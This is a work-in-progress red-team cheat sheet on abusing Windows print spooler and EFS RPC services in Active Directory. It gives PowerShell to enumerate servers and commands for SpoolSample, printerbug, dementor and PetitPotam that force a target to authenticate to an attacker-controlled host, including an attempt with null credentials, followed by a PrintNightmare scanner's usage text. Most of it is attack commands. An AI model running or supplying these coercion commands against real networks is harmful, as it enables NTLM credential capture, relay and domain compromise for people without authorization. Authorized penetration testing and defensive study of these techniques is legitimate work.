Spooler Service

WIP

Finding Spooler Services

# https://book.hacktricks.xyz/windows/active-directory-methodology/printers-spooler-service-abuse

# Finding Windows Servers on the domain
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

# Finding Spooler services listening 
# https://github.com/NotMedic/NetNTLMtoSilverTicket
.\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

# Or on Linux
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN


MS-RPRN Abuse (Printer Bug)

https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-rprn

# Ask the service to authenticate against an arbitrary host
# Using SpoolSample (https://github.com/NotMedic/NetNTLMtoSilverTicket)
SpoolSample.exe <TARGET> <RESPONDERIP>

# Using printerbug or dementor
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>


MS-SFSRPC

# Really great doc
https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-efsr

# Can test the uid through MSF
# scanner/smb/pipe_dcerpc_auditor
# TODO

# PoC tool to coerce Windows hosts to authenticate to other machines
# via MS-EFSRPC EfsRpcOpenFileRaw function
# Disabling the EFS service seems not to mitigate the "feature".
https://github.com/topotam/PetitPotam

$ ./petitpotam.py -d domain.com -u myuser -p mypass <attacker_ip> <target>

# Seems possible to use NULL sessions on some domain controllers
# TEST
$ ./petitpotam.py -d '' -u '' -p '' <attacker_ip> <target>


PrintNightmare (CVE-2021-34527)

# Python Scanner
https://github.com/byt3bl33d3r/ItWasAllADream

usage: itwasalladream [-h] -u USERNAME [-p PASSWORD] -d DOMAIN [--timeout TIMEOUT] [--threads THREADS] [-v] [--csv-column CSV_COLUMN] target

PrintNightmare (CVE-2021-34527) scanner

positional arguments:
  target                Target subnet in CIDR notation, CSV file or newline-delimited text file

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        username to authenticate as (default: None)
  -p PASSWORD, --password PASSWORD
                        password to authenticate as. If not specified will prompt. (default: None)
  -d DOMAIN, --domain DOMAIN
                        domain to authenticate as (default: None)
  --timeout TIMEOUT     Connection timeout in secods (default: 30)
  --threads THREADS     Max concurrent threads (default: 100)
  -v, --verbose         Enable verbose output (default: False)
  --csv-column CSV_COLUMN
                        If target argument is a CSV file, this argument specifies which column to parse (default: DNSHostName)